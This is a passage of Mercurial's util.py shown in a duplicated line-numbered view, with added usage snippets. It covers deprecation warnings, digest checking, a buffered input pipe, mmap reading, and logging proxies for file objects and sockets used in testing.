169 # silence warning emitted by passing user string to re.sub()
170 warnings.filterwarnings(
170 warnings.filterwarnings(
171 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
171 'ignore', 'bad escape', DeprecationWarning, 'mercurial'
172 )
172 )
173 warnings.filterwarnings(
173 warnings.filterwarnings(
174 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
174 'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
175 )
175 )
176 # TODO: reinvent imp.is_frozen()
176 # TODO: reinvent imp.is_frozen()
177 warnings.filterwarnings(
177 warnings.filterwarnings(
178 'ignore',
178 'ignore',
179 'the imp module is deprecated',
179 'the imp module is deprecated',
180 DeprecationWarning,
180 DeprecationWarning,
181 'mercurial',
181 'mercurial',
182 )
182 )
183
183
184
184
185 def nouideprecwarn(msg, version, stacklevel=1):
185 def nouideprecwarn(msg, version, stacklevel=1):
186 """Issue an python native deprecation warning
186 """Issue an python native deprecation warning
187
187
188 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
188 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
189 """
189 """
190 if _dowarn:
190 if _dowarn:
191 msg += (
191 msg += (
192 b"\n(compatibility will be dropped after Mercurial-%s,"
192 b"\n(compatibility will be dropped after Mercurial-%s,"
193 b" update your code.)"
193 b" update your code.)"
194 ) % version
194 ) % version
195 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
195 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
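
# An illustrative call, with a made-up message and version string; it only
# produces output when HGEMITWARNINGS is set, e.g. under the test suite.

from mercurial import util

util.nouideprecwarn(
    b'repo.foo is deprecated, use repo.bar instead', b'5.3', stacklevel=2
)
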
196
196
197
197
198 DIGESTS = {
198 DIGESTS = {
199 b'md5': hashlib.md5,
199 b'md5': hashlib.md5,
200 b'sha1': hashlib.sha1,
200 b'sha1': hashlib.sha1,
201 b'sha512': hashlib.sha512,
201 b'sha512': hashlib.sha512,
202 }
202 }
203 # List of digest types from strongest to weakest
203 # List of digest types from strongest to weakest
204 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
204 DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']
205
205
206 for k in DIGESTS_BY_STRENGTH:
206 for k in DIGESTS_BY_STRENGTH:
207 assert k in DIGESTS
207 assert k in DIGESTS
208
208
209
209
210 class digester(object):
210 class digester(object):
211 """helper to compute digests.
211 """helper to compute digests.
212
212
213 This helper can be used to compute one or more digests given their name.
213 This helper can be used to compute one or more digests given their name.
214
214
215 >>> d = digester([b'md5', b'sha1'])
215 >>> d = digester([b'md5', b'sha1'])
216 >>> d.update(b'foo')
216 >>> d.update(b'foo')
217 >>> [k for k in sorted(d)]
217 >>> [k for k in sorted(d)]
218 ['md5', 'sha1']
218 ['md5', 'sha1']
219 >>> d[b'md5']
219 >>> d[b'md5']
220 'acbd18db4cc2f85cedef654fccc4a4d8'
220 'acbd18db4cc2f85cedef654fccc4a4d8'
221 >>> d[b'sha1']
221 >>> d[b'sha1']
222 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
222 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
223 >>> digester.preferred([b'md5', b'sha1'])
223 >>> digester.preferred([b'md5', b'sha1'])
224 'sha1'
224 'sha1'
225 """
225 """
226
226
227 def __init__(self, digests, s=b''):
227 def __init__(self, digests, s=b''):
228 self._hashes = {}
228 self._hashes = {}
229 for k in digests:
229 for k in digests:
230 if k not in DIGESTS:
230 if k not in DIGESTS:
231 raise error.Abort(_(b'unknown digest type: %s') % k)
231 raise error.Abort(_(b'unknown digest type: %s') % k)
232 self._hashes[k] = DIGESTS[k]()
232 self._hashes[k] = DIGESTS[k]()
233 if s:
233 if s:
234 self.update(s)
234 self.update(s)
235
235
236 def update(self, data):
236 def update(self, data):
237 for h in self._hashes.values():
237 for h in self._hashes.values():
238 h.update(data)
238 h.update(data)
239
239
240 def __getitem__(self, key):
240 def __getitem__(self, key):
241 if key not in DIGESTS:
241 if key not in DIGESTS:
242 raise error.Abort(_(b'unknown digest type: %s') % key)
242 raise error.Abort(_(b'unknown digest type: %s') % key)
243 return nodemod.hex(self._hashes[key].digest())
243 return nodemod.hex(self._hashes[key].digest())
244
244
245 def __iter__(self):
245 def __iter__(self):
246 return iter(self._hashes)
246 return iter(self._hashes)
247
247
248 @staticmethod
248 @staticmethod
249 def preferred(supported):
249 def preferred(supported):
250 """returns the strongest digest type in both supported and DIGESTS."""
250 """returns the strongest digest type in both supported and DIGESTS."""
251
251
252 for k in DIGESTS_BY_STRENGTH:
252 for k in DIGESTS_BY_STRENGTH:
253 if k in supported:
253 if k in supported:
254 return k
254 return k
255 return None
255 return None
256
256
257
257
258 class digestchecker(object):
258 class digestchecker(object):
259 """file handle wrapper that additionally checks content against a given
259 """file handle wrapper that additionally checks content against a given
260 size and digests.
260 size and digests.
261
261
262 d = digestchecker(fh, size, {'md5': '...'})
262 d = digestchecker(fh, size, {'md5': '...'})
263
263
264 When multiple digests are given, all of them are validated.
264 When multiple digests are given, all of them are validated.
265 """
265 """
266
266
267 def __init__(self, fh, size, digests):
267 def __init__(self, fh, size, digests):
268 self._fh = fh
268 self._fh = fh
269 self._size = size
269 self._size = size
270 self._got = 0
270 self._got = 0
271 self._digests = dict(digests)
271 self._digests = dict(digests)
272 self._digester = digester(self._digests.keys())
272 self._digester = digester(self._digests.keys())
273
273
274 def read(self, length=-1):
274 def read(self, length=-1):
275 content = self._fh.read(length)
275 content = self._fh.read(length)
276 self._digester.update(content)
276 self._digester.update(content)
277 self._got += len(content)
277 self._got += len(content)
278 return content
278 return content
279
279
280 def validate(self):
280 def validate(self):
281 if self._size != self._got:
281 if self._size != self._got:
282 raise error.Abort(
282 raise error.Abort(
283 _(b'size mismatch: expected %d, got %d')
283 _(b'size mismatch: expected %d, got %d')
284 % (self._size, self._got)
284 % (self._size, self._got)
285 )
285 )
286 for k, v in self._digests.items():
286 for k, v in self._digests.items():
287 if v != self._digester[k]:
287 if v != self._digester[k]:
288 # i18n: first parameter is a digest name
288 # i18n: first parameter is a digest name
289 raise error.Abort(
289 raise error.Abort(
290 _(b'%s mismatch: expected %s, got %s')
290 _(b'%s mismatch: expected %s, got %s')
291 % (k, v, self._digester[k])
291 % (k, v, self._digester[k])
292 )
292 )
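
# A minimal sketch of the wrapper above, assuming mercurial.util is
# importable; the payload and digest are computed on the spot so the check
# passes.

import hashlib
import io

from mercurial import util

payload = b'some bundle data'
fh = util.digestchecker(
    io.BytesIO(payload),
    len(payload),
    {b'sha1': hashlib.sha1(payload).hexdigest().encode('ascii')},
)
while fh.read(4):
    pass          # drain the wrapped file through the checker
fh.validate()     # raises error.Abort on a size or digest mismatch
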
293
293
294
294
295 try:
295 try:
296 buffer = buffer
296 buffer = buffer
297 except NameError:
297 except NameError:
298
298
299 def buffer(sliceable, offset=0, length=None):
299 def buffer(sliceable, offset=0, length=None):
300 if length is not None:
300 if length is not None:
301 return memoryview(sliceable)[offset : offset + length]
301 return memoryview(sliceable)[offset : offset + length]
302 return memoryview(sliceable)[offset:]
302 return memoryview(sliceable)[offset:]
303
303
304
304
305 _chunksize = 4096
305 _chunksize = 4096
306
306
307
307
308 class bufferedinputpipe(object):
308 class bufferedinputpipe(object):
309 """a manually buffered input pipe
309 """a manually buffered input pipe
310
310
311 Python will not let us use buffered IO and lazy reading with 'polling' at
311 Python will not let us use buffered IO and lazy reading with 'polling' at
312 the same time. We cannot probe the buffer state and select will not detect
312 the same time. We cannot probe the buffer state and select will not detect
313 that data are ready to read if they are already buffered.
313 that data are ready to read if they are already buffered.
314
314
315 This class lets us work around that by implementing its own buffering
315 This class lets us work around that by implementing its own buffering
316 (allowing efficient readline) while offering a way to know if the buffer is
316 (allowing efficient readline) while offering a way to know if the buffer is
317 empty from the output (allowing collaboration of the buffer with polling).
317 empty from the output (allowing collaboration of the buffer with polling).
318
318
319 This class lives in the 'util' module because it makes use of the 'os'
319 This class lives in the 'util' module because it makes use of the 'os'
320 module from the python stdlib.
320 module from the python stdlib.
321 """
321 """
322
322
323 def __new__(cls, fh):
323 def __new__(cls, fh):
324 # If we receive a fileobjectproxy, we need to use a variation of this
324 # If we receive a fileobjectproxy, we need to use a variation of this
325 # class that notifies observers about activity.
325 # class that notifies observers about activity.
326 if isinstance(fh, fileobjectproxy):
326 if isinstance(fh, fileobjectproxy):
327 cls = observedbufferedinputpipe
327 cls = observedbufferedinputpipe
328
328
329 return super(bufferedinputpipe, cls).__new__(cls)
329 return super(bufferedinputpipe, cls).__new__(cls)
330
330
331 def __init__(self, input):
331 def __init__(self, input):
332 self._input = input
332 self._input = input
333 self._buffer = []
333 self._buffer = []
334 self._eof = False
334 self._eof = False
335 self._lenbuf = 0
335 self._lenbuf = 0
336
336
337 @property
337 @property
338 def hasbuffer(self):
338 def hasbuffer(self):
339 """True is any data is currently buffered
339 """True is any data is currently buffered
340
340
341 This will be used externally a pre-step for polling IO. If there is
341 This will be used externally a pre-step for polling IO. If there is
342 already data then no polling should be set in place."""
342 already data then no polling should be set in place."""
343 return bool(self._buffer)
343 return bool(self._buffer)
344
344
345 @property
345 @property
346 def closed(self):
346 def closed(self):
347 return self._input.closed
347 return self._input.closed
348
348
349 def fileno(self):
349 def fileno(self):
350 return self._input.fileno()
350 return self._input.fileno()
351
351
352 def close(self):
352 def close(self):
353 return self._input.close()
353 return self._input.close()
354
354
355 def read(self, size):
355 def read(self, size):
356 while (not self._eof) and (self._lenbuf < size):
356 while (not self._eof) and (self._lenbuf < size):
357 self._fillbuffer()
357 self._fillbuffer()
358 return self._frombuffer(size)
358 return self._frombuffer(size)
359
359
360 def unbufferedread(self, size):
360 def unbufferedread(self, size):
361 if not self._eof and self._lenbuf == 0:
361 if not self._eof and self._lenbuf == 0:
362 self._fillbuffer(max(size, _chunksize))
362 self._fillbuffer(max(size, _chunksize))
363 return self._frombuffer(min(self._lenbuf, size))
363 return self._frombuffer(min(self._lenbuf, size))
364
364
365 def readline(self, *args, **kwargs):
365 def readline(self, *args, **kwargs):
366 if len(self._buffer) > 1:
366 if len(self._buffer) > 1:
367 # this should not happen because both read and readline end with a
367 # this should not happen because both read and readline end with a
368 # _frombuffer call that collapses it.
368 # _frombuffer call that collapses it.
369 self._buffer = [b''.join(self._buffer)]
369 self._buffer = [b''.join(self._buffer)]
370 self._lenbuf = len(self._buffer[0])
370 self._lenbuf = len(self._buffer[0])
371 lfi = -1
371 lfi = -1
372 if self._buffer:
372 if self._buffer:
373 lfi = self._buffer[-1].find(b'\n')
373 lfi = self._buffer[-1].find(b'\n')
374 while (not self._eof) and lfi < 0:
374 while (not self._eof) and lfi < 0:
375 self._fillbuffer()
375 self._fillbuffer()
376 if self._buffer:
376 if self._buffer:
377 lfi = self._buffer[-1].find(b'\n')
377 lfi = self._buffer[-1].find(b'\n')
378 size = lfi + 1
378 size = lfi + 1
379 if lfi < 0: # end of file
379 if lfi < 0: # end of file
380 size = self._lenbuf
380 size = self._lenbuf
381 elif len(self._buffer) > 1:
381 elif len(self._buffer) > 1:
382 # we need to take previous chunks into account
382 # we need to take previous chunks into account
383 size += self._lenbuf - len(self._buffer[-1])
383 size += self._lenbuf - len(self._buffer[-1])
384 return self._frombuffer(size)
384 return self._frombuffer(size)
385
385
386 def _frombuffer(self, size):
386 def _frombuffer(self, size):
387 """return at most 'size' data from the buffer
387 """return at most 'size' data from the buffer
388
388
389 The data are removed from the buffer."""
389 The data are removed from the buffer."""
390 if size == 0 or not self._buffer:
390 if size == 0 or not self._buffer:
391 return b''
391 return b''
392 buf = self._buffer[0]
392 buf = self._buffer[0]
393 if len(self._buffer) > 1:
393 if len(self._buffer) > 1:
394 buf = b''.join(self._buffer)
394 buf = b''.join(self._buffer)
395
395
396 data = buf[:size]
396 data = buf[:size]
397 buf = buf[len(data) :]
397 buf = buf[len(data) :]
398 if buf:
398 if buf:
399 self._buffer = [buf]
399 self._buffer = [buf]
400 self._lenbuf = len(buf)
400 self._lenbuf = len(buf)
401 else:
401 else:
402 self._buffer = []
402 self._buffer = []
403 self._lenbuf = 0
403 self._lenbuf = 0
404 return data
404 return data
405
405
406 def _fillbuffer(self, size=_chunksize):
406 def _fillbuffer(self, size=_chunksize):
407 """read data to the buffer"""
407 """read data to the buffer"""
408 data = os.read(self._input.fileno(), size)
408 data = os.read(self._input.fileno(), size)
409 if not data:
409 if not data:
410 self._eof = True
410 self._eof = True
411 else:
411 else:
412 self._lenbuf += len(data)
412 self._lenbuf += len(data)
413 self._buffer.append(data)
413 self._buffer.append(data)
414
414
415 return data
415 return data
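
# A minimal sketch of the buffering behaviour described above, using an OS
# pipe as input; the data is made up.

import os

from mercurial import util

rfd, wfd = os.pipe()
os.write(wfd, b'first line\nsecond line\n')
os.close(wfd)

pipe = util.bufferedinputpipe(os.fdopen(rfd, 'rb'))
print(pipe.hasbuffer)   # False: nothing has been read yet
print(pipe.readline())  # b'first line\n'
print(pipe.hasbuffer)   # True: the rest of the chunk stayed buffered
print(pipe.read(6))     # b'second'
pipe.close()
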
416
416
417
417
418 def mmapread(fp):
418 def mmapread(fp):
419 try:
419 try:
420 fd = getattr(fp, 'fileno', lambda: fp)()
420 fd = getattr(fp, 'fileno', lambda: fp)()
421 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
421 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
422 except ValueError:
422 except ValueError:
423 # Empty files cannot be mmapped, but mmapread should still work. Check
423 # Empty files cannot be mmapped, but mmapread should still work. Check
424 # if the file is empty, and if so, return an empty buffer.
424 # if the file is empty, and if so, return an empty buffer.
425 if os.fstat(fd).st_size == 0:
425 if os.fstat(fd).st_size == 0:
426 return b''
426 return b''
427 raise
427 raise
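
# An illustrative use of the helper above; the temporary file stands in for a
# real on-disk store.

import tempfile

from mercurial import util

with tempfile.TemporaryFile() as fp:
    fp.write(b'\x00\x01\x02\x03 payload')
    fp.flush()
    data = util.mmapread(fp)  # mmap object, or b'' for an empty file
    assert bytes(data[:4]) == b'\x00\x01\x02\x03'
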
428
428
429
429
430 class fileobjectproxy(object):
430 class fileobjectproxy(object):
431 """A proxy around file objects that tells a watcher when events occur.
431 """A proxy around file objects that tells a watcher when events occur.
432
432
433 This type is intended to only be used for testing purposes. Think hard
433 This type is intended to only be used for testing purposes. Think hard
434 before using it in important code.
434 before using it in important code.
435 """
435 """
436
436
437 __slots__ = (
437 __slots__ = (
438 '_orig',
438 '_orig',
439 '_observer',
439 '_observer',
440 )
440 )
441
441
442 def __init__(self, fh, observer):
442 def __init__(self, fh, observer):
443 object.__setattr__(self, '_orig', fh)
443 object.__setattr__(self, '_orig', fh)
444 object.__setattr__(self, '_observer', observer)
444 object.__setattr__(self, '_observer', observer)
445
445
446 def __getattribute__(self, name):
446 def __getattribute__(self, name):
447 ours = {
447 ours = {
448 '_observer',
448 '_observer',
449 # IOBase
449 # IOBase
450 'close',
450 'close',
451 # closed is a property
451 # closed is a property
452 'fileno',
452 'fileno',
453 'flush',
453 'flush',
454 'isatty',
454 'isatty',
455 'readable',
455 'readable',
456 'readline',
456 'readline',
457 'readlines',
457 'readlines',
458 'seek',
458 'seek',
459 'seekable',
459 'seekable',
460 'tell',
460 'tell',
461 'truncate',
461 'truncate',
462 'writable',
462 'writable',
463 'writelines',
463 'writelines',
464 # RawIOBase
464 # RawIOBase
465 'read',
465 'read',
466 'readall',
466 'readall',
467 'readinto',
467 'readinto',
468 'write',
468 'write',
469 # BufferedIOBase
469 # BufferedIOBase
470 # raw is a property
470 # raw is a property
471 'detach',
471 'detach',
472 # read defined above
472 # read defined above
473 'read1',
473 'read1',
474 # readinto defined above
474 # readinto defined above
475 # write defined above
475 # write defined above
476 }
476 }
477
477
478 # We only observe some methods.
478 # We only observe some methods.
479 if name in ours:
479 if name in ours:
480 return object.__getattribute__(self, name)
480 return object.__getattribute__(self, name)
481
481
482 return getattr(object.__getattribute__(self, '_orig'), name)
482 return getattr(object.__getattribute__(self, '_orig'), name)
483
483
484 def __nonzero__(self):
484 def __nonzero__(self):
485 return bool(object.__getattribute__(self, '_orig'))
485 return bool(object.__getattribute__(self, '_orig'))
486
486
487 __bool__ = __nonzero__
487 __bool__ = __nonzero__
488
488
489 def __delattr__(self, name):
489 def __delattr__(self, name):
490 return delattr(object.__getattribute__(self, '_orig'), name)
490 return delattr(object.__getattribute__(self, '_orig'), name)
491
491
492 def __setattr__(self, name, value):
492 def __setattr__(self, name, value):
493 return setattr(object.__getattribute__(self, '_orig'), name, value)
493 return setattr(object.__getattribute__(self, '_orig'), name, value)
494
494
495 def __iter__(self):
495 def __iter__(self):
496 return object.__getattribute__(self, '_orig').__iter__()
496 return object.__getattribute__(self, '_orig').__iter__()
497
497
498 def _observedcall(self, name, *args, **kwargs):
498 def _observedcall(self, name, *args, **kwargs):
499 # Call the original object.
499 # Call the original object.
500 orig = object.__getattribute__(self, '_orig')
500 orig = object.__getattribute__(self, '_orig')
501 res = getattr(orig, name)(*args, **kwargs)
501 res = getattr(orig, name)(*args, **kwargs)
502
502
503 # Call a method on the observer of the same name with arguments
503 # Call a method on the observer of the same name with arguments
504 # so it can react, log, etc.
504 # so it can react, log, etc.
505 observer = object.__getattribute__(self, '_observer')
505 observer = object.__getattribute__(self, '_observer')
506 fn = getattr(observer, name, None)
506 fn = getattr(observer, name, None)
507 if fn:
507 if fn:
508 fn(res, *args, **kwargs)
508 fn(res, *args, **kwargs)
509
509
510 return res
510 return res
511
511
512 def close(self, *args, **kwargs):
512 def close(self, *args, **kwargs):
513 return object.__getattribute__(self, '_observedcall')(
513 return object.__getattribute__(self, '_observedcall')(
514 'close', *args, **kwargs
514 'close', *args, **kwargs
515 )
515 )
516
516
517 def fileno(self, *args, **kwargs):
517 def fileno(self, *args, **kwargs):
518 return object.__getattribute__(self, '_observedcall')(
518 return object.__getattribute__(self, '_observedcall')(
519 'fileno', *args, **kwargs
519 'fileno', *args, **kwargs
520 )
520 )
521
521
522 def flush(self, *args, **kwargs):
522 def flush(self, *args, **kwargs):
523 return object.__getattribute__(self, '_observedcall')(
523 return object.__getattribute__(self, '_observedcall')(
524 'flush', *args, **kwargs
524 'flush', *args, **kwargs
525 )
525 )
526
526
527 def isatty(self, *args, **kwargs):
527 def isatty(self, *args, **kwargs):
528 return object.__getattribute__(self, '_observedcall')(
528 return object.__getattribute__(self, '_observedcall')(
529 'isatty', *args, **kwargs
529 'isatty', *args, **kwargs
530 )
530 )
531
531
532 def readable(self, *args, **kwargs):
532 def readable(self, *args, **kwargs):
533 return object.__getattribute__(self, '_observedcall')(
533 return object.__getattribute__(self, '_observedcall')(
534 'readable', *args, **kwargs
534 'readable', *args, **kwargs
535 )
535 )
536
536
537 def readline(self, *args, **kwargs):
537 def readline(self, *args, **kwargs):
538 return object.__getattribute__(self, '_observedcall')(
538 return object.__getattribute__(self, '_observedcall')(
539 'readline', *args, **kwargs
539 'readline', *args, **kwargs
540 )
540 )
541
541
542 def readlines(self, *args, **kwargs):
542 def readlines(self, *args, **kwargs):
543 return object.__getattribute__(self, '_observedcall')(
543 return object.__getattribute__(self, '_observedcall')(
544 'readlines', *args, **kwargs
544 'readlines', *args, **kwargs
545 )
545 )
546
546
547 def seek(self, *args, **kwargs):
547 def seek(self, *args, **kwargs):
548 return object.__getattribute__(self, '_observedcall')(
548 return object.__getattribute__(self, '_observedcall')(
549 'seek', *args, **kwargs
549 'seek', *args, **kwargs
550 )
550 )
551
551
552 def seekable(self, *args, **kwargs):
552 def seekable(self, *args, **kwargs):
553 return object.__getattribute__(self, '_observedcall')(
553 return object.__getattribute__(self, '_observedcall')(
554 'seekable', *args, **kwargs
554 'seekable', *args, **kwargs
555 )
555 )
556
556
557 def tell(self, *args, **kwargs):
557 def tell(self, *args, **kwargs):
558 return object.__getattribute__(self, '_observedcall')(
558 return object.__getattribute__(self, '_observedcall')(
559 'tell', *args, **kwargs
559 'tell', *args, **kwargs
560 )
560 )
561
561
562 def truncate(self, *args, **kwargs):
562 def truncate(self, *args, **kwargs):
563 return object.__getattribute__(self, '_observedcall')(
563 return object.__getattribute__(self, '_observedcall')(
564 'truncate', *args, **kwargs
564 'truncate', *args, **kwargs
565 )
565 )
566
566
567 def writable(self, *args, **kwargs):
567 def writable(self, *args, **kwargs):
568 return object.__getattribute__(self, '_observedcall')(
568 return object.__getattribute__(self, '_observedcall')(
569 'writable', *args, **kwargs
569 'writable', *args, **kwargs
570 )
570 )
571
571
572 def writelines(self, *args, **kwargs):
572 def writelines(self, *args, **kwargs):
573 return object.__getattribute__(self, '_observedcall')(
573 return object.__getattribute__(self, '_observedcall')(
574 'writelines', *args, **kwargs
574 'writelines', *args, **kwargs
575 )
575 )
576
576
577 def read(self, *args, **kwargs):
577 def read(self, *args, **kwargs):
578 return object.__getattribute__(self, '_observedcall')(
578 return object.__getattribute__(self, '_observedcall')(
579 'read', *args, **kwargs
579 'read', *args, **kwargs
580 )
580 )
581
581
582 def readall(self, *args, **kwargs):
582 def readall(self, *args, **kwargs):
583 return object.__getattribute__(self, '_observedcall')(
583 return object.__getattribute__(self, '_observedcall')(
584 'readall', *args, **kwargs
584 'readall', *args, **kwargs
585 )
585 )
586
586
587 def readinto(self, *args, **kwargs):
587 def readinto(self, *args, **kwargs):
588 return object.__getattribute__(self, '_observedcall')(
588 return object.__getattribute__(self, '_observedcall')(
589 'readinto', *args, **kwargs
589 'readinto', *args, **kwargs
590 )
590 )
591
591
592 def write(self, *args, **kwargs):
592 def write(self, *args, **kwargs):
593 return object.__getattribute__(self, '_observedcall')(
593 return object.__getattribute__(self, '_observedcall')(
594 'write', *args, **kwargs
594 'write', *args, **kwargs
595 )
595 )
596
596
597 def detach(self, *args, **kwargs):
597 def detach(self, *args, **kwargs):
598 return object.__getattribute__(self, '_observedcall')(
598 return object.__getattribute__(self, '_observedcall')(
599 'detach', *args, **kwargs
599 'detach', *args, **kwargs
600 )
600 )
601
601
602 def read1(self, *args, **kwargs):
602 def read1(self, *args, **kwargs):
603 return object.__getattribute__(self, '_observedcall')(
603 return object.__getattribute__(self, '_observedcall')(
604 'read1', *args, **kwargs
604 'read1', *args, **kwargs
605 )
605 )
606
606
607
607
608 class observedbufferedinputpipe(bufferedinputpipe):
608 class observedbufferedinputpipe(bufferedinputpipe):
609 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
609 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
610
610
611 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
611 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
612 bypass ``fileobjectproxy``. Because of this, we need to make
612 bypass ``fileobjectproxy``. Because of this, we need to make
613 ``bufferedinputpipe`` aware of these operations.
613 ``bufferedinputpipe`` aware of these operations.
614
614
615 This variation of ``bufferedinputpipe`` can notify observers about
615 This variation of ``bufferedinputpipe`` can notify observers about
616 ``os.read()`` events. It also re-publishes other events, such as
616 ``os.read()`` events. It also re-publishes other events, such as
617 ``read()`` and ``readline()``.
617 ``read()`` and ``readline()``.
618 """
618 """
619
619
620 def _fillbuffer(self):
620 def _fillbuffer(self):
621 res = super(observedbufferedinputpipe, self)._fillbuffer()
621 res = super(observedbufferedinputpipe, self)._fillbuffer()
622
622
623 fn = getattr(self._input._observer, 'osread', None)
623 fn = getattr(self._input._observer, 'osread', None)
624 if fn:
624 if fn:
625 fn(res, _chunksize)
625 fn(res, _chunksize)
626
626
627 return res
627 return res
628
628
629 # We use different observer methods because the operation isn't
629 # We use different observer methods because the operation isn't
630 # performed on the actual file object but on us.
630 # performed on the actual file object but on us.
631 def read(self, size):
631 def read(self, size):
632 res = super(observedbufferedinputpipe, self).read(size)
632 res = super(observedbufferedinputpipe, self).read(size)
633
633
634 fn = getattr(self._input._observer, 'bufferedread', None)
634 fn = getattr(self._input._observer, 'bufferedread', None)
635 if fn:
635 if fn:
636 fn(res, size)
636 fn(res, size)
637
637
638 return res
638 return res
639
639
640 def readline(self, *args, **kwargs):
640 def readline(self, *args, **kwargs):
641 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
641 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
642
642
643 fn = getattr(self._input._observer, 'bufferedreadline', None)
643 fn = getattr(self._input._observer, 'bufferedreadline', None)
644 if fn:
644 if fn:
645 fn(res)
645 fn(res)
646
646
647 return res
647 return res
648
648
649
649
650 PROXIED_SOCKET_METHODS = {
650 PROXIED_SOCKET_METHODS = {
651 'makefile',
651 'makefile',
652 'recv',
652 'recv',
653 'recvfrom',
653 'recvfrom',
654 'recvfrom_into',
654 'recvfrom_into',
655 'recv_into',
655 'recv_into',
656 'send',
656 'send',
657 'sendall',
657 'sendall',
658 'sendto',
658 'sendto',
659 'setblocking',
659 'setblocking',
660 'settimeout',
660 'settimeout',
661 'gettimeout',
661 'gettimeout',
662 'setsockopt',
662 'setsockopt',
663 }
663 }
664
664
665
665
666 class socketproxy(object):
666 class socketproxy(object):
667 """A proxy around a socket that tells a watcher when events occur.
667 """A proxy around a socket that tells a watcher when events occur.
668
668
669 This is like ``fileobjectproxy`` except for sockets.
669 This is like ``fileobjectproxy`` except for sockets.
670
670
671 This type is intended to only be used for testing purposes. Think hard
671 This type is intended to only be used for testing purposes. Think hard
672 before using it in important code.
672 before using it in important code.
673 """
673 """
674
674
675 __slots__ = (
675 __slots__ = (
676 '_orig',
676 '_orig',
677 '_observer',
677 '_observer',
678 )
678 )
679
679
680 def __init__(self, sock, observer):
680 def __init__(self, sock, observer):
681 object.__setattr__(self, '_orig', sock)
681 object.__setattr__(self, '_orig', sock)
682 object.__setattr__(self, '_observer', observer)
682 object.__setattr__(self, '_observer', observer)
683
683
684 def __getattribute__(self, name):
684 def __getattribute__(self, name):
685 if name in PROXIED_SOCKET_METHODS:
685 if name in PROXIED_SOCKET_METHODS:
686 return object.__getattribute__(self, name)
686 return object.__getattribute__(self, name)
687
687
688 return getattr(object.__getattribute__(self, '_orig'), name)
688 return getattr(object.__getattribute__(self, '_orig'), name)
689
689
690 def __delattr__(self, name):
690 def __delattr__(self, name):
691 return delattr(object.__getattribute__(self, '_orig'), name)
691 return delattr(object.__getattribute__(self, '_orig'), name)
692
692
693 def __setattr__(self, name, value):
693 def __setattr__(self, name, value):
694 return setattr(object.__getattribute__(self, '_orig'), name, value)
694 return setattr(object.__getattribute__(self, '_orig'), name, value)
695
695
696 def __nonzero__(self):
696 def __nonzero__(self):
697 return bool(object.__getattribute__(self, '_orig'))
697 return bool(object.__getattribute__(self, '_orig'))
698
698
699 __bool__ = __nonzero__
699 __bool__ = __nonzero__
700
700
701 def _observedcall(self, name, *args, **kwargs):
701 def _observedcall(self, name, *args, **kwargs):
702 # Call the original object.
702 # Call the original object.
703 orig = object.__getattribute__(self, '_orig')
703 orig = object.__getattribute__(self, '_orig')
704 res = getattr(orig, name)(*args, **kwargs)
704 res = getattr(orig, name)(*args, **kwargs)
705
705
706 # Call a method on the observer of the same name with arguments
706 # Call a method on the observer of the same name with arguments
707 # so it can react, log, etc.
707 # so it can react, log, etc.
708 observer = object.__getattribute__(self, '_observer')
708 observer = object.__getattribute__(self, '_observer')
709 fn = getattr(observer, name, None)
709 fn = getattr(observer, name, None)
710 if fn:
710 if fn:
711 fn(res, *args, **kwargs)
711 fn(res, *args, **kwargs)
712
712
713 return res
713 return res
714
714
715 def makefile(self, *args, **kwargs):
715 def makefile(self, *args, **kwargs):
716 res = object.__getattribute__(self, '_observedcall')(
716 res = object.__getattribute__(self, '_observedcall')(
717 'makefile', *args, **kwargs
717 'makefile', *args, **kwargs
718 )
718 )
719
719
720 # The file object may be used for I/O. So we turn it into a
720 # The file object may be used for I/O. So we turn it into a
721 # proxy using our observer.
721 # proxy using our observer.
722 observer = object.__getattribute__(self, '_observer')
722 observer = object.__getattribute__(self, '_observer')
723 return makeloggingfileobject(
723 return makeloggingfileobject(
724 observer.fh,
724 observer.fh,
725 res,
725 res,
726 observer.name,
726 observer.name,
727 reads=observer.reads,
727 reads=observer.reads,
728 writes=observer.writes,
728 writes=observer.writes,
729 logdata=observer.logdata,
729 logdata=observer.logdata,
730 logdataapis=observer.logdataapis,
730 logdataapis=observer.logdataapis,
731 )
731 )
732
732
733 def recv(self, *args, **kwargs):
733 def recv(self, *args, **kwargs):
734 return object.__getattribute__(self, '_observedcall')(
734 return object.__getattribute__(self, '_observedcall')(
735 'recv', *args, **kwargs
735 'recv', *args, **kwargs
736 )
736 )
737
737
738 def recvfrom(self, *args, **kwargs):
738 def recvfrom(self, *args, **kwargs):
739 return object.__getattribute__(self, '_observedcall')(
739 return object.__getattribute__(self, '_observedcall')(
740 'recvfrom', *args, **kwargs
740 'recvfrom', *args, **kwargs
741 )
741 )
742
742
743 def recvfrom_into(self, *args, **kwargs):
743 def recvfrom_into(self, *args, **kwargs):
744 return object.__getattribute__(self, '_observedcall')(
744 return object.__getattribute__(self, '_observedcall')(
745 'recvfrom_into', *args, **kwargs
745 'recvfrom_into', *args, **kwargs
746 )
746 )
747
747
748 def recv_into(self, *args, **kwargs):
748 def recv_into(self, *args, **kwargs):
749 return object.__getattribute__(self, '_observedcall')(
749 return object.__getattribute__(self, '_observedcall')(
750 'recv_into', *args, **kwargs
750 'recv_into', *args, **kwargs
751 )
751 )
752
752
753 def send(self, *args, **kwargs):
753 def send(self, *args, **kwargs):
754 return object.__getattribute__(self, '_observedcall')(
754 return object.__getattribute__(self, '_observedcall')(
755 'send', *args, **kwargs
755 'send', *args, **kwargs
756 )
756 )
757
757
758 def sendall(self, *args, **kwargs):
758 def sendall(self, *args, **kwargs):
759 return object.__getattribute__(self, '_observedcall')(
759 return object.__getattribute__(self, '_observedcall')(
